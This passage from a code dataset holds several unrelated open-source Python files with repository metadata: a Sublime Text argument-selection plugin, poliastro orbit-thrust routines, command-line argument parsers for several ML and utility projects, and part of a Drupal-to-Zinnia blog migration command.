''' removes any inner parenthesis and also cuts off the string at the
right hand side when the first non-matched ')' is reached '''
characters = []
num_lparen = 0
for c in s:
if c == '(':
num_lparen += 1
elif c == ')':
num_lparen -= 1
# stop if end of parameter list reached
if num_lparen < 0:
break
if num_lparen:
characters.append('_')
else:
characters.append(c)
return ''.join(characters)
def remove_tail(s):
# remove all characters after semicolon
s = re.sub(r'(?s);.*', '', s)
# if there are two adjacent identifiers with only whitespace containing
# a newline inbetween, assume a right parenthesis is missing after
# the first identifier and insert one (while preserving character offsets)
def repl_func(m):
non_identifiers = [
'mod', 'div', 'and', 'or', 'xor', 'not', 'if',
'unless', 'else', 'const',
]
if (m.group(1) not in non_identifiers and m.group(3) not in non_identifiers
and '\n' in m.group(2) or '\n' in m.group(2)):
return ''.join([m.group(1), ')', m.group(2)[1:], m.group(3)])
else:
return m.group(0)
s = re.sub(r'([a-zA-Z_0-9]+)(\s+)([a-zA-Z_0-9])', repl_func, s)
return s
class ViExpandToArguments(sublime_plugin.TextCommand):
def run(self, edit, outer=False, repeat=1, multiline=True):
for i in range(repeat):
transform_selection_regions(
self.view, self.expand_region_to_argument,
outer=outer, multiline=multiline
)
def expand_region_to_argument(self, region, outer=False, multiline=True):
# determine where the cursor is placed and what surrounding
# text fragment region to consider
pt = region.a
r = self.view.line(pt)
if multiline:
last_line = self.view.rowcol(self.view.size()-1)[0]
line_no = self.view.rowcol(pt)[0]
# make the region of interest span 10 lines backwards and forwards
l_beg, l_end = (max(0, line_no-10),
min(last_line, line_no+10))
r = self.view.line(self.view.text_point(l_beg, 0)).cover(
self.view.line(self.view.text_point(l_end, 0)))
# limit the region just in case the lines are very long
r = r.intersection(sublime.Region(pt - 4000, pt + 4000))
# extract the surrounding text and determine the offset
# from the start of it where the cursor is placed
s = self.view.substr(r)
cursor_offset = pt - r.a
# replace literal strings by placeholders so that offsets are
# preserved but parenthesis and commmas within strings do not
# affect the later steps
s = s.replace("\\'", '_').replace('\\"', '!') # remove string escape codes
s = re.sub(r'(?s)""".*?"""', lambda m: '!' * len(m.group(0)), s)
s = re.sub(r"(?s)'''.*?'''", lambda m: '!' * len(m.group(0)), s)
s = re.sub(r'".*?"', lambda m: '!' * len(m.group(0)), s)
s = re.sub(r"'.*?'", lambda m: '!' * len(m.group(0)), s)
# find offsets to the start of all non-empty argument lists that
# precede the cursor
offsets = [m.start(1) for m in re.finditer(
r'(?x)[a-zA-Z0-9_]+[!?]? \s* \( ( (?!\s*\))[^)] )', s)
if m.start(1) <= cursor_offset]
if offsets:
# pick the last argument list offset
offset = offsets[-1]
args_str = s[offset:]
# trim the right part of the string at semicolons and at suspected
# missing right parenthesis in order to decrease the risk that we
# we go too far to the right.
args_str = remove_tail(args_str)
# remove any inner parenthesis: "a*min(b, c), d" ==> "a*min______, d"
args_str = remove_inner_parenthesis(args_str)
# find arguments by splitting at commas
args = re.findall(r'[^,]+,?\s*|,\s*', args_str)
# find the argument that matches the cursor offset
i = offset
for arg_i, arg in enumerate(args):
if cursor_offset <= i + len(arg.rstrip(', ')):
# create a region that covers this argument
if not outer:
arg = arg.rstrip(', \t\r\n')
a = region.a - (cursor_offset - i)
b = a + len(arg)
# if the argument is the last one and outer mode is on,
# expand to the left to cover any whitespace or commas
if outer and arg_i == len(args)-1: #self.view.substr(b) == ')':
while self.view.substr(a - 1) in ', \t\r\n':
a -= 1
return sublime.Region(a, b)
else:
i += len(arg)
return region
| {
"repo_name": "nliberg/argument-noun",
"path": "argument_noun.py",
"copies": "1",
"size": "5661",
"license": "mit",
"hash": 7841227986467533000,
"line_mean": 38.0413793103,
"line_max": 83,
"alpha_frac": 0.5394806571,
"autogenerated": false,
"ratio": 3.753978779840849,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47934594369408484,
"avg_score": null,
"num_lines": null
} |
"""Argument of perigee change, with formulas developed by Pollard.
References
----------
* Pollard, J. E. "Simplified Approach for Assessment of Low-Thrust
Elliptical Orbit Transfers", 1997.
* Pollard, J. E. "Evaluation of Low-Thrust Orbital Maneuvers", 1998.
"""
import numpy as np
from poliastro.twobody.decorators import state_from_vector
from poliastro.util import norm, circular_velocity
def apsidal_precession(ss, J2):
return (
3 * ss.n * ss.attractor.R ** 2 * J2 * (4 - 5 * np.sin(ss.inc) ** 2) /
(4 * ss.a ** 2 * (1 - ss.ecc ** 2) ** 2)
)
def guidance_law(f):
"""Guidance law from the model.
Thrust is aligned with an inertially fixed direction perpendicular to the
semimajor axis of the orbit.
Parameters
----------
f : float
Magnitude of constant acceleration
"""
@state_from_vector
def a_d(t0, ss):
r = ss.r.value
v = ss.v.value
nu = ss.nu.value
alpha_ = nu - np.pi / 2
r_ = r / norm(r)
w_ = np.cross(r, v) / norm(np.cross(r, v))
s_ = np.cross(w_, r_)
accel_v = f * (
np.cos(alpha_) * s_ +
np.sin(alpha_) * r_
)
return accel_v
return a_d
def delta_V(V, ecc, argp_0, argp_f, f, A):
"""Compute required increment of velocity.
"""
delta_argp = argp_f - argp_0
return delta_argp / (3 * np.sign(delta_argp) / 2 * np.sqrt(1 - ecc ** 2) / ecc / V + A / f)
def extra_quantities(k, a, ecc, argp_0, argp_f, f, A=0.0):
"""Extra quantities given by the model.
"""
V = circular_velocity(k, a)
delta_V_ = delta_V(V, ecc, argp_0, argp_f, f, A)
t_f_ = delta_V_ / f
return delta_V_, t_f_
if __name__ == '__main__':
from poliastro.examples import iss
J2_EARTH = 0.0010826359
print(apsidal_precession(iss, J2_EARTH))
| {
"repo_name": "Juanlu001/pfc-uc3m",
"path": "code/argp.py",
"copies": "1",
"size": "1864",
"license": "mit",
"hash": 7813391985060625000,
"line_mean": 22.3,
"line_max": 95,
"alpha_frac": 0.5659871245,
"autogenerated": false,
"ratio": 2.798798798798799,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3864785923298799,
"avg_score": null,
"num_lines": null
} |
"""Argument of perigee change, with formulas developed by Pollard.
References
----------
* Pollard, J. E. "Simplified Approach for Assessment of Low-Thrust
Elliptical Orbit Transfers", 1997.
* Pollard, J. E. "Evaluation of Low-Thrust Orbital Maneuvers", 1998.
"""
import numpy as np
from numba import njit
from numpy import cross
from numpy.linalg import norm
from poliastro.core.elements import rv2coe
from poliastro.core.thrust.change_argp import extra_quantities
def change_argp(k, a, ecc, argp_0, argp_f, f):
"""Guidance law from the model.
Thrust is aligned with an inertially fixed direction perpendicular to the
semimajor axis of the orbit.
Parameters
----------
f : float
Magnitude of constant acceleration
"""
@njit
def a_d(t0, u_, k):
r = u_[:3]
v = u_[3:]
nu = rv2coe(k, r, v)[-1]
alpha_ = nu - np.pi / 2
r_ = r / norm(r)
w_ = cross(r, v) / norm(cross(r, v))
s_ = cross(w_, r_)
accel_v = f * (np.cos(alpha_) * s_ + np.sin(alpha_) * r_)
return accel_v
delta_V, t_f = extra_quantities(k, a, ecc, argp_0, argp_f, f, A=0.0)
return a_d, delta_V, t_f
| {
"repo_name": "poliastro/poliastro",
"path": "src/poliastro/twobody/thrust/change_argp.py",
"copies": "1",
"size": "1193",
"license": "mit",
"hash": 3962008808821241300,
"line_mean": 24.9347826087,
"line_max": 77,
"alpha_frac": 0.6060352054,
"autogenerated": false,
"ratio": 2.8816425120772946,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3987677717477295,
"avg_score": null,
"num_lines": null
} |
""" Argument parser for ConvNN """
import argparse as ap
def _args_parse():
""" Allows for command line hyperparameter inputs to models
Description
------------
--image_size: Sets up the size of a square image, default is 32*32 for CIFAR10
--features : Sizes of convolutional feature maps, the first one ought to be 3 corresponding to RGB channels
--norm : Batch-normalisation boolean flag (default is True)
--ptype : Specifies pooling type:
- 'max' (default) for max pooling
- 'average' for average pooling
--aug : Data augmentation boolean flag (default is False)
--dropout : Set dropout probability, p = 1.0 (default) implies nothing is dropped out
--optype : Specifies optimizer type, default set to 'ADAM', if anything else is chosen, RMSProp is used
--hsize : Specifies the size of the hidden layer in the fully connected layer that follows conv layers
--bsize : Specifies the batch size for training
Note
----
Assertions and exceptions are not added, please be careful in passing arguments. If in doubt, please allow default values.
For non-square images appropriate modifications need to be made in helper_nn.py
"""
parser = ap.ArgumentParser(description = 'Hyperparameters')
parser.add_argument('--image_size', type = int, dest = 'img_size',
action = 'store', default = 32)
parser.add_argument('--features', type = list, dest = 'conv_features',
action = 'store', default = [3, 64, 128, 256])
parser.add_argument('--norm', type = bool, dest = 'normalisation',
action = 'store', default = True)
parser.add_argument('--ptype', dest = 'pooling_type',
action = 'store', default = 'max')
parser.add_argument('--aug', type = bool, dest = 'augmentation',
action = 'store', default = False)
parser.add_argument('--dropout', dest = 'dropout_p',
action = 'store', default = 1.0)
parser.add_argument('--optype', type = str, dest = 'optimization',
action = 'store', default = 'ADAM')
parser.add_argument('--hsize', type = int, dest = 'hidden_layer_size',
action = 'store', default = 500)
parser.add_argument('--bsize', type = int, dest = 'batch_size',
action = 'store', default = 300)
parser.add_argument('--eta', type = float, dest = 'learning_rate',
action = 'store', default = 0.01)
flags = parser.parse_args()
return flags
| {
"repo_name": "kkothari93/convNN_CIFAR10",
"path": "parseargs_convnn.py",
"copies": "1",
"size": "2612",
"license": "mit",
"hash": -2332818924359955500,
"line_mean": 48.2830188679,
"line_max": 123,
"alpha_frac": 0.6068147014,
"autogenerated": false,
"ratio": 4.030864197530864,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9762095708441193,
"avg_score": 0.07511663809793426,
"num_lines": 53
} |
""" Argument parser for pp options. """
import re
from collections import namedtuple
from .api import Mods
Argument = namedtuple("Argument", "pattern kwarg_pattern type default")
mods_names = re.compile(r"\w{2}")
kwarg = r"{}=(?P<value>\S+)"
class RegexArgumentParser:
""" Create a simple orderless regex argument parser. """
def __init__(self):
self.arguments = {}
def add(self, name, pattern, type, default=None):
""" Adds an argument. The pattern must have a group. """
self.arguments[name] = Argument(pattern=re.compile(pattern, flags=re.IGNORECASE),
kwarg_pattern=re.compile(kwarg.format(name)),
type=type, default=default)
def parse(self, *args):
""" Parse arguments.
:raise ValueError: An argument is invalid.
"""
Namespace = namedtuple("Namespace", " ".join(self.arguments.keys()))
_namespace = {name: arg.default for name, arg in self.arguments.items()}
# Go through all arguments and find a match
for user_arg in args:
for name, arg in self.arguments.items():
# Skip any already assigned arguments
if _namespace[name] is not arg.default:
continue
# Assign the arguments on match and break the lookup
match = arg.pattern.fullmatch(user_arg, )
if match:
_namespace[name] = arg.type(match.group(1))
break
# Check for kwarg patterns (e.g acc=99.32 instead of 99.32%)
match = arg.kwarg_pattern.fullmatch(user_arg)
if match:
_namespace[name] = arg.type(match.group("value"))
break
else:
raise ValueError("{} is an invalid argument.".format(user_arg))
# Return the complete Namespace namedtuple
return Namespace(**_namespace)
def mods(s: str):
""" Return a list of api.Mods from the given str. """
names = mods_names.findall(s)
mod_list = []
# Find and add all identified mods
for name in names:
for mod in Mods:
# Skip duplicate mods
if mod in mod_list:
continue
if mod.name.lower() == name.lower():
mod_list.append(mod)
break
return mod_list
parser = RegexArgumentParser()
parser.add("acc", r"([0-9.]+)%", type=float)
parser.add("c300", r"(\d+)x300", type=int)
parser.add("c100", r"(\d+)x100", type=int, default=0)
parser.add("c50", r"(\d+)x50", type=int, default=0)
parser.add("misses", r"(\d+)(?:m|xm(?:iss)?)", type=int, default=0)
parser.add("combo", r"(\d+)x", type=int)
parser.add("mods", r"\+(\w+)", type=mods)
parser.add("score_version", r"(?:score)?v([12])", type=int, default=1)
parser.add("ar", r"ar([0-9.]+)", type=float)
parser.add("cs", r"cs([0-9.]+)", type=float)
parser.add("od", r"od([0-9.]+)", type=float)
parser.add("hp", r"hp([0-9.]+)", type=float)
parser.add("hits", "(\d+)hits", type=int)
parser.add("pp", r"([0-9.]+)pp", type=float)
def parse(*args):
""" Parse pp arguments. """
return parser.parse(*args)
| {
"repo_name": "PcBoy111/PCBOT",
"path": "plugins/osulib/args.py",
"copies": "2",
"size": "3243",
"license": "mit",
"hash": -7945878478429027000,
"line_mean": 31.7575757576,
"line_max": 89,
"alpha_frac": 0.5612087573,
"autogenerated": false,
"ratio": 3.710526315789474,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0005948911203002504,
"num_lines": 99
} |
'''Argument parsing module
'''
import argparse
import ast
import copy
import inspect
import logging
import re
import sys
from sphinxcontrib.napoleon import Config
from sphinxcontrib.napoleon.docstring import GoogleDocstring
from . import data, optimizer, train
__author__ = 'R Devon Hjelm'
__author_email__ = 'erroneus@gmail.com'
def parse_kwargs(f):
kwargs = {}
sig = inspect.signature(f)
for i, (sk, sv) in enumerate(sig.parameters.items()):
if sk == 'self':
pass
elif sk == 'kwargs':
pass
elif sv.default == inspect.Parameter.empty:
pass
else:
v = copy.deepcopy(sv.default)
kwargs[sv.name] = v
return kwargs
def parse_inputs(f):
args = []
sig = inspect.signature(f)
for i, (sk, sv) in enumerate(sig.parameters.items()):
if sk == 'self':
pass
elif sk == 'kwargs':
pass
elif sv.default == inspect.Parameter.empty:
args.append(sv.name)
return args
def parse_docstring(f):
if f.__doc__ is None:
f.__doc__ = 'TODO\n TODO'
doc = inspect.cleandoc(f.__doc__)
config = Config()
google_doc = GoogleDocstring(doc, config)
rst = str(google_doc)
param_regex = r':param (?P<param>\w+): (?P<doc>.*)'
m = re.findall(param_regex, rst)
args_help = dict((k, v) for k, v in m)
return args_help
def parse_header(f):
if f.__doc__ is None:
f.__doc__ = 'TODO\n TODO'
doc = inspect.cleandoc(f.__doc__)
config = Config()
google_doc = GoogleDocstring(doc, config)
rst = str(google_doc)
lines = [l for l in rst.splitlines() if len(l) > 0]
if len(lines) >= 2:
return lines[:2]
elif len(lines) == 1:
return lines[0]
else:
return None, None
data_help = parse_docstring(data.setup)
data_args = parse_kwargs(data.setup)
train_help = parse_docstring(train.main_loop)
train_args = parse_kwargs(train.main_loop)
optimizer_help = parse_docstring(optimizer.setup)
optimizer_args = parse_kwargs(optimizer.setup)
default_args = dict(data=data_args, optimizer=optimizer_args, train=train_args)
default_help = dict(data=data_help, optimizer=optimizer_help, train=train_help)
_protected_args = ['arch', 'out_path', 'name', 'reload',
'args', 'copy_to_local', 'meta', 'config_file',
'clean', 'verbosity', 'test']
logger = logging.getLogger('cortex.parsing')
def make_argument_parser() -> argparse.ArgumentParser:
'''Generic experiment parser.
Generic parser takes the experiment yaml as the main argument, but has some
options for reloading, etc. This parser can be easily extended using a
wrapper method.
Returns:
argparse.parser
'''
parser = argparse.ArgumentParser(
formatter_class=lambda prog: argparse.HelpFormatter(
prog, max_help_position=50, width=100))
parser.add_argument(
'-o',
'--out_path',
default=None,
help=('Output path directory. All model results will go'
' here. If a new directory, a new one will be '
'created, as long as parent exists.'))
parser.add_argument(
'-n',
'--name',
default=None,
help=('Name of the experiment. If given, base name of '
'output directory will be `--name`. If not given,'
' name will be the base name of the `--out_path`'))
parser.add_argument('-r', '--reload', type=str, default=None,
help=('Path to model to reload.'))
parser.add_argument('-a', '--autoreload', default=False,
action='store_true')
parser.add_argument('-R', '--networks_to_reload', type=str, nargs='+',
default=None)
parser.add_argument('-L', '--load_networks',
type=str, default=None,
help=('Path to model to reload. Does not load args,'
' info, etc'))
parser.add_argument('-m', '--meta', type=str, default=None)
parser.add_argument('-c', '--config_file', default=None,
help=('Configuration yaml file. '
'See `exps/` for examples'))
parser.add_argument('-k', '--clean', action='store_true', default=False,
help=('Cleans the output directory. '
'This cannot be undone!'))
parser.add_argument('-v', '--verbosity', type=int, default=1,
help='Verbosity of the logging. (0, 1, 2)')
parser.add_argument('-d', '--device', type=int, default=0)
return parser
class StoreDictKeyPair(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
d = {}
for kv in values.split(',,'):
k, v = kv.split('=')
try:
d[k] = ast.literal_eval(v)
except ValueError:
d[k] = v
setattr(namespace, self.dest, d)
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def _parse_model(model, subparser):
global default_args
kwargs = dict((k, v) for k, v in model.kwargs.items())
model_defaults = model.defaults
model_defaults_model = model.defaults.pop('model', {})
update_args(model_defaults_model, kwargs)
helps = model.help
for k, v in kwargs.items():
help = helps.get(k, None)
_parse_kwargs(k, v, help, subparser)
default_args = dict((k, v) for k, v in default_args.items())
update_args(model_defaults, default_args)
for key, args in default_args.items():
_parse_defaults(key, args, subparser)
def _parse_defaults(key, args, subparser):
for k, v in args.items():
arg_str = '--' + key[0] + '.' + k
help = default_help[key][k]
dest = key + '.' + k
if isinstance(v, dict):
dstr = ',,'.join(
['{}={}'.format(k, str(v)) for k, v in v.items()])
dstr = dstr.replace(' ', '')
dstr = dstr.replace(']', '')
dstr = dstr.replace('[', '')
metavar = '<k1=v1>' + ' defaults={' + dstr + '})'
subparser.add_argument(
arg_str,
dest=dest,
default=None,
action=StoreDictKeyPair,
help=help,
metavar=metavar)
elif isinstance(v, bool) and not v:
action = 'store_true'
dest = key + '.' + k
subparser.add_argument(arg_str, dest=dest,
action=action, default=False,
help=help)
elif isinstance(v, bool):
type_ = type(v)
metavar = '<' + type_.__name__ + \
'> (default=' + str(v) + ')'
dest = key + '.' + k
subparser.add_argument(
arg_str,
dest=dest,
default=True,
metavar=metavar,
type=str2bool,
help=help)
else:
type_ = type(v) if v is not None else str
metavar = '<' + type_.__name__ + \
'> (default=' + str(v) + ')'
subparser.add_argument(
arg_str,
dest=dest,
default=v,
metavar=metavar,
type=type_,
help=help)
def _parse_kwargs(k, v, help, subparser):
arg_str = '--' + k
choices = None
if isinstance(v, dict):
dstr = ',,'.join(
['{}={}'.format(k, str(v)) for k, v in v.items()])
dstr = dstr.replace(' ', '')
dstr = dstr.replace(']', '')
dstr = dstr.replace('[', '')
metavar = '<k1=v1>' + ' defaults={' + dstr + '})'
subparser.add_argument(
arg_str,
dest=k,
default=v,
action=StoreDictKeyPair,
help=help,
metavar=metavar)
elif isinstance(v, bool) and not v:
action = 'store_true'
subparser.add_argument(
arg_str, dest=k, action=action, default=False, help=help)
elif isinstance(v, bool):
type_ = type(v)
metavar = '<' + type_.__name__ + '> (default=' + str(v) + ')'
subparser.add_argument(
arg_str,
dest=k,
default=True,
metavar=metavar,
type=str2bool,
help=help)
else:
type_ = type(v) if v is not None else str
metavar = '<' + type_.__name__ + '> (default=' + str(v) + ')'
subparser.add_argument(
arg_str,
dest=k,
choices=choices,
metavar=metavar,
default=v,
type=type_,
help=help)
def parse_args(models, model=None):
'''Parse the command line arguments.
Args:
models: dictionary of models.
Returns:
'''
parser = make_argument_parser()
if model is None:
subparsers = parser.add_subparsers(
title='Cortex',
help='Select an architecture.',
description='Cortex is a wrapper '
'around pytorch that makes training models '
'more convenient.',
dest='command')
subparsers.add_parser(
'setup', help='Setup cortex configuration.',
description='Initializes or updates the `.cortex.yml` file.')
for k, model in models.items():
model_help, model_description = parse_header(model)
subparser = subparsers.add_parser(
k,
help=model_help,
description=model_description,
formatter_class=lambda prog: argparse.HelpFormatter(
prog, max_help_position=50, width=100))
_parse_model(model, subparser)
else:
_parse_model(model, parser)
command = sys.argv[1:]
idx = []
for i, c in enumerate(command):
if c.startswith('-') and not(c.startswith('--')):
idx.append(i)
header = []
# argparse is picky about ordering
for i in idx[::-1]:
a = None
if i + 1 < len(command):
a = command[i + 1]
if a is not None and (a.startswith('-') or a.startswith('--')):
a = None
if a is not None:
a = command.pop(i + 1)
c = command.pop(i)
header += [c, a]
else:
c = command.pop(i)
header.append(c)
command = header + command
args = parser.parse_args(command)
if not hasattr(args, 'command'):
args.command = None
return args
def update_args(kwargs, kwargs_to_update):
def _update_args(from_kwargs, to_kwargs):
for k, v in from_kwargs.items():
if isinstance(v, dict) and k not in to_kwargs:
to_kwargs[k] = v
elif isinstance(v, dict) and isinstance(to_kwargs[k], dict):
_update_args(v, to_kwargs[k])
else:
to_kwargs[k] = v
_update_args(kwargs, kwargs_to_update)
| {
"repo_name": "rdevon/cortex",
"path": "cortex/_lib/parsing.py",
"copies": "1",
"size": "11374",
"license": "bsd-3-clause",
"hash": 2069801486658089200,
"line_mean": 29.3306666667,
"line_max": 79,
"alpha_frac": 0.5218920345,
"autogenerated": false,
"ratio": 3.880586830433299,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4902478864933299,
"avg_score": null,
"num_lines": null
} |
"""Argument parsing."""
import argparse
from encarne.stats import show_stats, clean_movies
# Specifying commands
parser = argparse.ArgumentParser(
description='Encarne reencoder')
parser.add_argument(
'-d', '--directory', type=str,
help='Directory that should be explored for video container to be encoded.')
parser.add_argument(
'-s', '--size', type=str,
help='Specify minimun encoding file size (11GB, 100MB, ...).')
# Encoding stuff
parser.add_argument(
'-c', '--crf', type=int, choices=range(0, 51),
help='Constant rate factor for ffmpeg.')
preset_values = ['ultrafast', 'superfast', 'veryfast',
'faster', 'fast', 'medium', 'slow', 'slower',
'veryslow', 'placebo']
parser.add_argument(
'-p', '--preset', type=str, choices=preset_values,
help='Compression preset for ffmpeg.')
audio_values = ['aac', 'flac', 'None']
parser.add_argument(
'-a', '--audio', type=str, choices=audio_values,
help='Audio encoding for ffmpeg.')
parser.add_argument(
'-ba', '--kbitrate-audio', type=str,
help='Audio encoding bitrate (e.g. 128k or not specified for flac).')
parser.add_argument(
'-t', '--threads', type=int,
help='The threads used for encoding.')
# Initialize supbparser
subparsers = parser.add_subparsers(
title='Subcommands', description='Various client')
# Status
stat_subcommand = subparsers.add_parser(
'stat', help='Show some statistics.',
)
stat_subcommand.set_defaults(func=show_stats)
# clean
clean_subcommand = subparsers.add_parser(
'clean', help='Check if any movies have been removed.',
)
clean_subcommand.set_defaults(func=clean_movies)
| {
"repo_name": "Nukesor/encarne",
"path": "encarne/argument_parser.py",
"copies": "1",
"size": "1664",
"license": "mit",
"hash": -6722204257746585000,
"line_mean": 27.6896551724,
"line_max": 80,
"alpha_frac": 0.6706730769,
"autogenerated": false,
"ratio": 3.4522821576763487,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.46229552345763486,
"avg_score": null,
"num_lines": null
} |
# Argument parsing/user input.
import argparse
import getpass
# Timestamp and date processing.
from datetime import datetime
import pytz
# ORM for Drupal database.
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
# String utiilities.
import urllib
# Django imports.
from django.core.management.base import BaseCommand, CommandError
from django.template.defaultfilters import slugify
from django.db import IntegrityError, transaction
from django.contrib.contenttypes.models import ContentType
# Django models.
from django.contrib.sites.models import Site
from django_comments import get_model as get_comment_model
# Zinnia models.
from zinnia.models import Author
from zinnia.models import Category
from zinnia.models import Entry
from zinnia.managers import PUBLISHED
# For preventing pingbacks during the import.
from zinnia.signals import disconnect_entry_signals
from zinnia.signals import disconnect_discussion_signals
# Retrieve the model used for comments.
Comment = get_comment_model()
#########################################
# Helper functions for argument parsing #
#########################################
class MappingAction(argparse.Action):
"""
Custom optparse action for processing arguments of format:
arg1[=maparg1]:arg2[=maparg2]:...:argN[=mapargN]
The action can be used for adding a dictionary to the specified namespace
where the keys are arg1, arg2, ..., argN, and values are maparg1, maparg2,
..., mapargN.
Specifying the maparg mapping is optional. When not specified, the action
will use the value of key. I.e. if you specify arg1=maparg1:arg2, resulting
dictionary will be {arg1: maparg1, arg2: arg2}.
"""
def __call__(self, parser, namespace, values, option_string=None):
# Set-up an empty dictinoary if nothing has been passed-in already.
if not getattr(namespace, self.dest):
setattr(namespace, self.dest, dict())
# Process the provided mappings, and populate the namespace.
for mapping in values.split(":"):
if "=" in mapping:
key, value = mapping.split("=", 1)
getattr(namespace, self.dest)[key] = value
else:
getattr(namespace, self.dest)[mapping] = mapping
class DrupalDatabase(object):
"""
Helper class for accessing the Drupal database. This class is a small
wrapper around the functionality provided by SQLAlchemy.
Properties:
session - SQLAlchemy session object that can be used for running queries
against the Drupal database.
Node - Drupal's 'node' table.
NodeRevisions - Drupal's 'node_revisions' table.
Users - Drupal's 'users' table.
Vocabulary - Drupal's 'vocabulary' table.
TermNode - Drupal's 'term_node' table.
TermData - Drupal's 'term_data' table.
TermHierarchy - Drupal's 'term_hierarchy' table.
Comments - Drupal's 'comments' table.
"""
def __init__(self, engine):
"""
Initialises the SQLAlchemy ORM for Drupal tables using the provided
engine.
Arguments:
engine
Initialised SQLAlchemy engine to use when setting-up ORM.
"""
# Store the engine and set-up a session that will be used for queries.
self.engine = engine
self.session = sessionmaker(bind=self.engine)()
Base = declarative_base(self.engine)
# Declare Drupal ORM classes.
class Node(Base):
"""
For accessing Drupal's "node" table. This table contains mainly metadata
about a node.
"""
__tablename__ = 'node'
__table_args__ = {'autoload': True}
class NodeRevisions(Base):
"""
For accessing Drupal's "node_revisions" table. This table contains the
actual content of nodes.
"""
__tablename__ = 'node_revisions'
__table_args__ = {'autoload': True}
class Users(Base):
"""
For accessing Drupal's "users" table. This table contains information about
users.
"""
__tablename__ = 'users'
__table_args__ = {'autoload': True}
class Vocabulary(Base):
"""
For accessing Drupal's "vocabulary" table. This table contains information
about Drupal vocabularies (tags and categories).
"""
__tablename__ = 'vocabulary'
__table_args__ = {'autoload': True}
class TermNode(Base):
"""
For accessing Drupal's "term_node" table. This table contains information about
mapping of terms from vocabulaires to nodes.
"""
__tablename__ = 'term_node'
__table_args__ = {'autoload': True}
class TermData(Base):
"""
For accessing Drupal's "term_data" table. This table contains data about
terms.
"""
__tablename__ = 'term_data'
__table_args__ = {'autoload': True}
class TermHierarchy(Base):
"""
For accessing Drupal's "term_hierarchy" table. This table contains data
about term hierarchies (used for importing categories).
"""
__tablename__ = 'term_hierarchy'
__table_args__ = {'autoload': True}
class Comments(Base):
"""
For accessing Drupal's "comments" table. This table contains comment data.
"""
__tablename__ = 'comments'
__table_args__ = {'autoload': True}
# Easier access to SQLAlchemy ORM.
self.Node = Node
self.NodeRevisions = NodeRevisions
self.Users = Users
self.Vocabulary = Vocabulary
self.TermNode = TermNode
self.TermData = TermData
self.TermHierarchy = TermHierarchy
self.Comments = Comments
def import_users(drupal, users=None, custom_mapping=None):
"""
Imports the requested users from Drupal database, taking into account any
desired custom mappings between usernames. Generates a mapping dictionary
between Drupal and Zinnia users.
Users will be created only if they do not already exist.
Arguments:
drupal
Drupal database from which the users should be imported. Should be an
instance of DrupalDatabase.
users
List of users that should be imported. If provided, only the specified
users will be imported from Drupal. Default (None) is to import all
users.
custom_mapping
Dictionary defining desired custom mapping between Drupal users and
Zinnia users. Keys should be usernames in Drupal, and values should be
desired usernames in Zinnia. Default (None) is to not to apply any
custom mapping.
Returns:
Tuple consisting out of two elements. The first element is dictionary with
import statistics (keys 'drupal_total', 'zinnia_new', and
'zinnia_existing'). The second element is a dictionary describing the
resulting mapping between the Drupal and Zinnia users, where keys are
Drupal user IDs, and values are Zinnia user IDs (not to be confused with
custom_mapping).
"""
mapping = {}
# Fetch the users from Drupal (all or just a subset).
if users:
drupal_users = drupal.session.query(drupal.Users).filter(drupal.Users.name.in_(users))
else:
drupal_users = drupal.session.query(drupal.Users).filter(drupal.Users.name != "")
# Set-up the statistics.
statistics = {
'drupal_total': drupal_users.count(),
'zinnia_new': 0,
'zinnia_existing': 0,
}
# Process each Drupal user.
for drupal_user in drupal_users:
# Apply mapping if it was provided.
username = custom_mapping.get(drupal_user.name, drupal_user.name)
# Fetch the user if it already exists, or create a new one if it
# doesn't.
try:
author = Author.objects.get(username=username)
print "User already exists: %s" % username
statistics["zinnia_existing"] += 1
except Author.DoesNotExist:
author = Author.objects.create_user(username, drupal_user.mail)
# Set the user password. "pass" is a reserved keyword in Python, so
# we must use the getattr here.
author.password = "md5$$%s" % getattr(drupal_user, "pass")
author.is_staff = True
author.save()
print "Added user: %s" % username
statistics["zinnia_new"] += 1
mapping[drupal_user.uid] = author.id
return statistics, mapping
def import_categories(drupal):
"""
Imports categories from Drupal into Zinnia. Categories are created only if
they do not exist. In addition, the Drupal vocabulary is treated as a
(top-level) category on its own when moved into Zinnia.
LIMITATION: The implementation assumes that all categories (terms in non-tag
vocabularies) in Drupal have _unique_ names. This in return simplifies the
import code (for determining whether the category needs to be created, or
existing one should be used).
Arguments:
drupal
Drupal database from which the categories should be imported. Should be
an instance of DrupalDatabase.
Returns:
Tuple consisting out of two elements. The first element is dictionary with
import statistics (keys 'drupal_total', 'zinnia_new', and
'zinnia_existing'). The second is a dictionary describing mapping between
the Drupal and Zinnia categories, where keys are Drupal category IDs, and
values are Zinnia category IDs.
"""
mapping = {}
# Dictinoary representing hierarchy of Drupal categories. Key corresponds to
# child, value corresponds to child's parent. If parent is set to "0", the
# category is supposed to be top-level.
hierarchy = {}
# Set-up the statistics.
statistics = {
"drupal_total": 0,
"zinnia_new": 0,
"zinnia_existing": 0,
}
# Drupal stores categories within a number of vocabularies. Extract all
# vocabularies that are not defining tags (that is, extract all category
# vocabularies).
vocabularies = drupal.session.query(drupal.Vocabulary).filter(drupal.Vocabulary.tags != 1)
# Import the categories from each vocabulary.
for vocabulary in vocabularies:
# Treat vocabulary itself as a category (top-level one).
statistics["drupal_total"] += 1
# Try to fetch existing, or create new category in Zinnia.
category, created = Category.objects.get_or_create(title=vocabulary.name, slug=slugify(vocabulary.name), description=vocabulary.description)
if created:
statistics["zinnia_new"] += 1
else:
statistics["zinnia_existing"] += 1
# Since vocabularies are not categories, use the vocabulary _name_ as
# identifier instead of primary key (in order to avoid collision with
# categories).
mapping[vocabulary.name] = category.pk
# Vocabulary "category" has no parents.
hierarchy[vocabulary.name] = 0
# Look-up the terms that belong to the vocabulary.
